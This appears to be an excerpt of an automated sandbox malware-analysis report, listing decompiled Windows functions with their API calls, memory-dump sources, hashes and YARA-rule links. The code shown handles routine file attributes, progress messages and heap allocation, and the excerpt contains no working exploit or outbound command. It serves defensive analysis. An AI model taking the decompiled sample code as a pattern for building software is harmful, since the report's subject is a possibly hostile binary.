                                                                                                                                                    • Instruction ID: 5550fe5211075fd06b29d29ebd2b7efecc30d85466180f38f4d50fe347156c03
                                                                                                                                                    • Opcode Fuzzy Hash: 4bf8361ba1f2b8a589bfc1e6be5a204070aa36ed726e19a05c97f80d9f3f764e
                                                                                                                                                    • Instruction Fuzzy Hash: 39015A72A0020DAFCB04DFA5C944BEEB7FCAF19705F10842EE556E7280DB30AA04CB64
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040139D, Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                    			E0040139D(signed int _a4) {
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t15;
				signed int _t16;
				void* _t17;

				_t16 = _a4;
				while(_t16 >= 0) {
					_t6 = _t16 * 0x1c +  *0x47ead0;
					if( *((intOrPtr*)(_t16 * 0x1c +  *0x47ead0)) == 1) {
						break;
					}
					_t8 = E004015A0(_t6); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040137E(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t15 = _t16;
						_t16 = _t11;
						_t12 = _t11 - _t15;
					} else {
						_t12 = _t10 + 1;
						_t16 = _t16 + 1;
					}
					if( *((intOrPtr*)(_t17 + 0xc)) != 0) {
						 *0x476a8c =  *0x476a8c + _t12;
						SendMessageW( *(_t17 + 0x18), 0x402, MulDiv( *0x476a8c, 0x7530,  *0x476a84), 0);
					}
				}
				return 0;
			}










                                                                                                                                                    0x0040139e
                                                                                                                                                    0x0040140c
                                                                                                                                                    0x004013a9
                                                                                                                                                    0x004013b2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004013b5
                                                                                                                                                    0x004013bf
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00401416
                                                                                                                                                    0x004013c2
                                                                                                                                                    0x004013c9
                                                                                                                                                    0x004013cf
                                                                                                                                                    0x004013d0
                                                                                                                                                    0x004013d2
                                                                                                                                                    0x004013d4
                                                                                                                                                    0x004013cb
                                                                                                                                                    0x004013cb
                                                                                                                                                    0x004013cc
                                                                                                                                                    0x004013cc
                                                                                                                                                    0x004013db
                                                                                                                                                    0x004013dd
                                                                                                                                                    0x00401406
                                                                                                                                                    0x00401406
                                                                                                                                                    0x004013db
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                                                    • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                    • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                    • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                                                                                                                                    • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                    • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E651B8F, Relevance: 3.0, APIs: 2, Instructions: 35fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 6E651BAC
                                                                                                                                                    • GetLastError.KERNEL32(?), ref: 6E651BB8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorFileLastWrite
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 442123175-0
                                                                                                                                                    • Opcode ID: 2753111b469a7d52ec75af7d26cffaabf2e6b9b0427e7b1d3695245b36d8f0c8
                                                                                                                                                    • Instruction ID: 891ac9fbded933c8e4748fdc2ee97074646c1faac1162446bfc5743d15e30318
                                                                                                                                                    • Opcode Fuzzy Hash: 2753111b469a7d52ec75af7d26cffaabf2e6b9b0427e7b1d3695245b36d8f0c8
                                                                                                                                                    • Instruction Fuzzy Hash: 35F0E231700216BBCF415FD1CC08EDE3B6DEF42728F104115F901AB294DB7299158BA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E65B176, Relevance: 3.0, APIs: 2, Instructions: 31COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetErrorMode.KERNELBASE(00000000,?,?,6E65077D,?,00000000,6E6915CC,00000000), ref: 6E65B17C
                                                                                                                                                    • SetErrorMode.KERNELBASE(00000000,?,?,6E65077D,?,00000000,6E6915CC,00000000), ref: 6E65B188
                                                                                                                                                      • Part of subcall function 6E65B1D4: GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,?), ref: 6E65B20F
                                                                                                                                                      • Part of subcall function 6E65B1D4: PathFindExtensionW.SHLWAPI(?), ref: 6E65B229
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorMode$ExtensionFileFindModuleNamePath
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1764437154-0
                                                                                                                                                    • Opcode ID: 2153042e6e46a72a47b26a8d78a26224a3acf423bb0eb27f63219223a878e930
                                                                                                                                                    • Instruction ID: b4966318c8a99cfe0b9000d3272f9c293824c2d182913007b35d120163cba2ea
                                                                                                                                                    • Opcode Fuzzy Hash: 2153042e6e46a72a47b26a8d78a26224a3acf423bb0eb27f63219223a878e930
                                                                                                                                                    • Instruction Fuzzy Hash: 4BF0BE70A103049FDBA0EFE5C40DA8E7FE8AF02758F048859E4498B319D772C861CFA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E6519D8, Relevance: 3.0, APIs: 2, Instructions: 26fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • ReadFile.KERNELBASE(?,00000040,00000000,00000000,00000000,?,?,?,6E62C477,?,00000008,00000008,?,00000002), ref: 6E6519F8
                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,6E62C477,?,00000008,00000008,?,00000002), ref: 6E651A05
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorFileLastRead
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1948546556-0
                                                                                                                                                    • Opcode ID: 9df49e50bce07ef544191b1eec93cc751ed47afb6bf99385da480b8379905a14
                                                                                                                                                    • Instruction ID: 22cf59591efc64a14cc1fbe5980df265e9af09e35097e5d4360e677e2d6e3f69
                                                                                                                                                    • Opcode Fuzzy Hash: 9df49e50bce07ef544191b1eec93cc751ed47afb6bf99385da480b8379905a14
                                                                                                                                                    • Instruction Fuzzy Hash: 8EE06536250609FFCF019FE6DC05ECA7BACAB06354F008424B902E5210EBB1DA249BA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E6514E1, Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • FindCloseChangeNotification.KERNELBASE(?,?,?,6E62C37B,00000000,?,00000001,00001000,00000000,00000000,00000000,3920FDCC), ref: 6E6514F0
                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,6E62C37B,00000000,?,00000001,00001000,00000000,00000000,00000000,3920FDCC), ref: 6E651514
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ChangeCloseErrorFindLastNotification
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1687624791-0
                                                                                                                                                    • Opcode ID: 3b76fccda60241e155b01aaa978def2775cc789311683e557dc3578e473c139f
                                                                                                                                                    • Instruction ID: 200e8a6b00582c0181f4325148059aecdfcc527116a416cca6e7b8b1b2c40100
                                                                                                                                                    • Opcode Fuzzy Hash: 3b76fccda60241e155b01aaa978def2775cc789311683e557dc3578e473c139f
                                                                                                                                                    • Instruction Fuzzy Hash: AAE09232501E23ABC7244BA5EC08A56F724BF02731701C324D87A56AF0DB309876CAD4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00405E7C, Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                    			E00405E7C(WCHAR* _a4, long _a8, long _a12) {
				signed int _t6;
				void* _t7;

				_t6 = GetFileAttributesW(_a4);
				_t2 = _t6 + 1; // 0x1
				asm("sbb ecx, ecx");
				_t7 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~_t2 & _t6, 0); // executed
				return _t7;
			}





                                                                                                                                                    0x00405e80
                                                                                                                                                    0x00405e86
                                                                                                                                                    0x00405e8d
                                                                                                                                                    0x00405ea2
                                                                                                                                                    0x00405ea8

                                                                                                                                                    APIs
                                                                                                                                                    • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$AttributesCreate
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 415043291-0
                                                                                                                                                    • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                    • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                                                                                                                                    • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                    • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00405E5C, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00405E5C(WCHAR* _a4) {
				signed int _t3;
				int _t5;

				_t3 = GetFileAttributesW(_a4); // executed
				if(_t3 != 0xffffffff) {
					_t5 = SetFileAttributesW(_a4, _t3 & 0xfffffffe); // executed
					return _t5;
				}
				return _t3;
			}





                                                                                                                                                    0x00405e60
                                                                                                                                                    0x00405e69
                                                                                                                                                    0x00405e73
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00405e73
                                                                                                                                                    0x00405e79

                                                                                                                                                    APIs
                                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                                                                                                    • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405E73
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.367328755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.367323943.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367337017.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367342716.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367348180.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367363484.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.367373378.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                    • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                    • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                                                                                                                                    • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                    • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E64F920, Relevance: 2.5, APIs: 2, Instructions: 30memorystringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GlobalAlloc.KERNELBASE(00000040,0000200C,?,?,6E64F9DF,?), ref: 6E64F93B
                                                                                                                                                    • lstrcpynW.KERNEL32(?,6E64F9DF,00002004,?,?,6E64F9DF,?), ref: 6E64F956
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocGloballstrcpyn
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3204721840-0
                                                                                                                                                    • Opcode ID: 4b2948936b2912c6f7d1fb081cb75bcd6d9d17c01dd5aaa4aa4bb3492df0e127
                                                                                                                                                    • Instruction ID: f9d729c8e6e3884961a60c35cff44e56f9ef01d0ef759f8a13dbc933149b1c82
                                                                                                                                                    • Opcode Fuzzy Hash: 4b2948936b2912c6f7d1fb081cb75bcd6d9d17c01dd5aaa4aa4bb3492df0e127
                                                                                                                                                    • Instruction Fuzzy Hash: FEF01774A4150AFFCB08CF9AC444EAABBF6FB4A304B21815AF90997350DA30AD40CF50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E6517D7, Relevance: 1.7, APIs: 1, Instructions: 160fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 6E651C23: __EH_prolog3_GS.LIBCMT ref: 6E651C2D
                                                                                                                                                      • Part of subcall function 6E651C23: GetFullPathNameW.KERNEL32(?,00000104,00000040,?,00000268,6E651850,?,00000040,?,00000040,00000104,00000000), ref: 6E651C60
                                                                                                                                                    • CreateFileW.KERNELBASE(00000040,80000000,00000000,0000000C,00000003,?,00000000,?,00000000,?,00000040,?,00000040,00000104,00000000), ref: 6E651977
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFileFullH_prolog3_NamePath
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2133410154-0
                                                                                                                                                    • Opcode ID: 9aec2a4aeafe1639c61e4dccad6d84ca25fbf7430589dba83351a29e8e643cb3
                                                                                                                                                    • Instruction ID: a64cc8077b9033bdd13ec4668007684b34dbe3a7b93eac3cc3c17fc2f2fa5055
                                                                                                                                                    • Opcode Fuzzy Hash: 9aec2a4aeafe1639c61e4dccad6d84ca25fbf7430589dba83351a29e8e643cb3
                                                                                                                                                    • Instruction Fuzzy Hash: 6D510771F40A1A9FEB10CFA5CC947DAB7A9EB46314F104AAAD428D7380D774CA98CB50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E632530, Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 6E632B90: _Min_value.LIBCPMTD ref: 6E632BBD
                                                                                                                                                    • allocator.LIBCONCRTD ref: 6E6325DC
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Min_valueallocator
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2162267568-0
                                                                                                                                                    • Opcode ID: bd3b74a945a4b475a7225590188e506d8eb9c8ec8255486ec4c525dfd3ceeff6
                                                                                                                                                    • Instruction ID: 012295327b46e5149b87b95f1942ae3272c37da732bd706cf6e702e4d0901031
                                                                                                                                                    • Opcode Fuzzy Hash: bd3b74a945a4b475a7225590188e506d8eb9c8ec8255486ec4c525dfd3ceeff6
                                                                                                                                                    • Instruction Fuzzy Hash: 4B51D4B5E001199FCB08CFD9D991AEEB7B9FF88304F209519E515A7390DB30AA01CFA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E65205A, Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: H_prolog3
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 431132790-0
                                                                                                                                                    • Opcode ID: 9161c91c77e1aae720f02607e1920ed6bb47b9bdcd62faa195d89259d933aea4
                                                                                                                                                    • Instruction ID: ae0a2beef37328bcabb3ab20511dfa3605f865055847a7c7dd61e8da8faf2dcd
                                                                                                                                                    • Opcode Fuzzy Hash: 9161c91c77e1aae720f02607e1920ed6bb47b9bdcd62faa195d89259d933aea4
                                                                                                                                                    • Instruction Fuzzy Hash: D2415BB1A102019FCB48DF68C8846AA3BB5BF49314F14466DE915DB386E774D950CF94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E662DFE, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • KiUserExceptionDispatcher.NTDLL(E06D7363,00000001,00000003,?,?,?,8007000E), ref: 6E662E5E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DispatcherExceptionUser
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 6842923-0
                                                                                                                                                    • Opcode ID: 4d36c622b7561782be88cc45daa5e5b12c55ca3c847d96606f0a1bd22b0e1ae3
                                                                                                                                                    • Instruction ID: c142521142be2789dd954f903abe5d76ebcbdc0e2df55887bbc8e40271f21f85
                                                                                                                                                    • Opcode Fuzzy Hash: 4d36c622b7561782be88cc45daa5e5b12c55ca3c847d96606f0a1bd22b0e1ae3
                                                                                                                                                    • Instruction Fuzzy Hash: 2101D675900609AFCB419F9CC490BAEBBB9FF4A710F11406AED25AB3A1D770E901CB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E674B9A, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6E67386E,00000001,00000364,FFFFFFFF,000000FF,?,8007000E,?,6E665559,6E67399B), ref: 6E674BDB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                    • Opcode ID: 04dab40fc11252c678989093e147852803cd8051d23e3f2cc7c59eaa853266d2
                                                                                                                                                    • Instruction ID: 7a4414cadb44653e04a9d70353fbd5c2e9c59b3b0c98a28c39d08bff13e4e35f
                                                                                                                                                    • Opcode Fuzzy Hash: 04dab40fc11252c678989093e147852803cd8051d23e3f2cc7c59eaa853266d2
                                                                                                                                                    • Instruction Fuzzy Hash: 32F0BB3514553657EF714AE69848F963F9C9F83B60F114551AC18DA140CBB0DC1286E0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 6E673958, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,8007000E,?,?,6E650862,8007000E,?,?,?,6E62DCAC,8007000E,?,6E6508EC,0000000C,00000004,6E6290DC), ref: 6E67398A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.374700225.000000006E621000.00000020.00020000.sdmp, Offset: 6E620000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.374692250.000000006E620000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374877526.000000006E685000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374899365.000000006E69B000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374907767.000000006E69E000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000000.00000002.374913948.000000006E6A0000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                    • Opcode ID: 242e1ff13a3b8ca55f4e412eb1f0a33ea6b7e86f9a0d44c0f6fa9d3d3abbe0fb
                                                                                                                                                    • Instruction ID: 880ef743994dd6cfe1de0ca66f73c75b2f8357058a213438903245649be619d0
                                                                                                                                                    • Opcode Fuzzy Hash: 242e1ff13a3b8ca55f4e412eb1f0a33ea6b7e86f9a0d44c0f6fa9d3d3abbe0fb
